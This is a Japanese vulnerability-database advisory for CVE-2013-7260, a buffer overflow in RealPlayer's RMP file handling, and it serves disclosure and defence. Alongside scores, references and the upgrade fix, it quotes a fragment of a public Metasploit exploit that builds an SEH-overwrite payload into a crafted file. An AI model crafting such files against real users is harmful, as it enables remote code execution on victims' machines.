RealNetworks RealPlayer 16.0.2.32/16.0.3.51/17.0.2.206 RMP File Version/Encoding メモリ破損

CVSS 一時的なメタスコア	現在のエクスプロイト価格 (≈)	CTI注目指数
9.5	$0-$5k	0.00

要約情報

現在、RealNetworks RealPlayer 16.0.2.32/16.0.3.51/17.0.2.206にて、重大と分類される脆弱性が確認されています。 影響を受けるのは、コンポーネント【RMP File Handler】の未知の関数です。 【Version/Encoding】引数を未知の値で改ざんすることが、 メモリ破損を突く攻撃に繋がります}。 この脆弱性はCVE-2013-7260として知られています。 さらに、悪用手段が存在します。 影響を受けているコンポーネントのアップグレードを推奨します。

詳細情報

現在、RealNetworks RealPlayer 16.0.2.32/16.0.3.51/17.0.2.206にて、重大と分類される脆弱性が確認されています。 影響を受けるのは、コンポーネント【RMP File Handler】の未知の関数です。 【Version/Encoding】引数を未知の値で改ざんすることが、 メモリ破損を突く攻撃に繋がります}。 CWEを使用して問題を宣言すると、CWE-119 につながります。 この脆弱性は 2013年12月20日に Core Securityの Gabor Seljanより「ウェブサイト」の 勧告にて 紹介されました。 アドバイザリはservice.real.comから入手可能です。

この脆弱性はCVE-2013-7260として知られています。 CVEの割当は2014年01月03日で行われました。 技術的な情報が提供されています。 この脆弱性の普及度は平均未満です。 さらに、悪用手段が存在します。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 エクスプロイトツールの現在の価格はおそらく米ドルで約$0-$5kです。

このエクスプロイトツールは 高度に機能的 として宣言されています。 エクスプロイトはgithub.comでダウンロードできます。 0-dayの際、アンダーグラウンド市場での想定価格は$25k-$100k前後でした。 エクスプロイトのソースコードは以下です：

def exploit

    sploit =  rand_text_alpha_upper(target['OffsetClick'])
    sploit << generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
    sploit << generate_seh_payload(target.ret)
    sploit << rand_text_alpha_upper(17000) # Generate exception
    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("<?xml version=\"" + sploit + "\"?>")
end

脆弱性診断ツールNessusは、ID 71772のプラグインを用意しています。 Windows ファミリーに分類されています。 商用脆弱性スキャナーQualysではプラグイン【 121845 (RealNetworks RealPlayer Buffer Overflow Vulnerability) 】を使用してこの問題をテストできます。

17.0.4.61にアップグレードすることで、本問題を解消できます。 影響を受けているコンポーネントのアップグレードを推奨します。 脆弱性の開示から すぐに 後に、可能な緩和策が公表されました。

また、この種の攻撃はTippingPointとフィルター14001を使用して検出・防御することができます。 脆弱性は「SecurityFocus (BID 64695), X-Force (90160), Secunia (SA56219), Vulnerability Center (SBV-43091) , Tenable (71772)」等の脆弱性データベースにも文書化されています。

製品情報

タイプ

• Multimedia Player Software

ベンダー

• RealNetworks

名前

• RealPlayer

バージョン

• 16.0.2.32
• 16.0.3.51
• 17.0.2.206

ライセンス

• 無償

ウェブサイト

• ベンダー: https://www.realnetworks.com/

CPE 2.3情報

• 🔍
• 🔍
• 🔍

CPE 2.2情報

• 🔍
• 🔍
• 🔍

CVSSv4情報

VulDB ベクトル: 🔍
VulDB 信頼性: 🔍

CVSSv3情報

VulDB ベースメタスコア: 10.0
VulDB 一時的なメタスコア: 9.5

VulDB ベーススコア: 10.0
VulDB 一時的なスコア: 9.5
VulDB ベクトル: 🔍
VulDB 信頼性: 🔍

CVSSv2情報

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

ベクトル	複雑さ	認証	機密性	完全性	可用性
解除	解除	解除	解除	解除	解除
解除	解除	解除	解除	解除	解除
解除	解除	解除	解除	解除	解除

VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍

NVD ベーススコア: 🔍

悪用情報

クラス: メモリ破損
CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍

物理的: いいえ
ローカル: いいえ
リモート: はい

可用性: 🔍
アクセス: パブリック
ステータス: 高度に機能的
著者: Gabor Seljan
プログラミング言語: 🔍
ダウンロード: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

価格予測: 🔍
現在の価格評価: 🔍

0-Day	解除	解除	解除	解除
本日	解除	解除	解除	解除

Nessus ID: 71772
Nessus 名前: RealPlayer for Windows < 17.0.4.61 RMP Buffer Overflow
Nessus ファイル: 🔍
Nessus リスク: 🔍
Nessus ファミリー: 🔍

OpenVAS ID: 801749
OpenVAS 名前: RealNetworks RealPlayer Buffer Overflow Vulnerability Dec13 (Windows)
OpenVAS ファイル: 🔍
OpenVAS ファミリー: 🔍

Qualys ID: 🔍
Qualys 名前: 🔍

MetaSploit ID: realplayer_ver_attribute_bof.rb
MetaSploit 名前: RealNetworks RealPlayer Version Attribute Buffer Overflow
MetaSploit ファイル: 🔍

Exploit-DB: 🔍

脅威インテリジェンス情報

関心: 🔍
アクティブアクター: 🔍
アクティブなAPTグループ: 🔍

対策情報

推奨: アップグレード
ステータス: 🔍

リアクション時間: 🔍
0day日時: 🔍
暴露時間: 🔍
エクスプロイト遅延時間: 🔍

アップグレード: RealPlayer 17.0.4.61
TippingPoint: 🔍

McAfee IPS: 🔍
McAfee IPS バージョン: 🔍

ISS Proventia IPS: 🔍
Fortigate IPS: 🔍

タイムライン情報

2013年12月17日 🔍
2013年12月20日 +3 日 🔍
2013年12月20日 +0 日 🔍
2013年12月20日 +0 日 🔍
2013年12月24日 +4 日 🔍
2013年12月24日 +0 日 🔍
2014年01月03日 +10 日 🔍
2014年01月03日 +0 日 🔍
2014年01月03日 +0 日 🔍
2014年01月28日 +25 日 🔍
2024年12月22日 +3981 日 🔍

ソース情報

ベンダー: realnetworks.com

勧告: service.real.com
調査者: Gabor Seljan
組織: Core Security
ステータス: 確認済み
確認: 🔍

CVE: CVE-2013-7260 (🔍)
GCVE (CVE): GCVE-0-2013-7260
GCVE (VulDB): GCVE-100-11603

IAVM: 🔍

CERT: 🔍
X-Force: 90160
SecurityFocus: 64695 - RealPlayer 'RMP' File Processing Remote Stack Buffer Overflow Vulnerability
Secunia: 56219 - RealPlayer RMP File Handling Buffer Overflow Vulnerability, Highly Critical
OSVDB: 101356
Vulnerability Center: 43091 - RealNetworks RealPlayer and Mac RealPlayer Remote Code Execution Vulnerability Via a RMP File (CVE-2013-7260), Medium

scip Labs: https://www.scip.ch/en/?labs.20161013
関連情報: 🔍

エントリ情報

作成済み: 2013年12月24日 23:43
更新済み: 2024年12月22日 20:41
変更: 2013年12月24日 23:43 (97), 2017年05月20日 00:00 (7), 2021年06月04日 14:41 (2), 2024年12月05日 13:44 (15), 2024年12月22日 20:41 (2)
完了: 🔍
Cache ID: 216:665:103

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

討論

Might our Artificial Intelligence support you?

Check our Alexa App!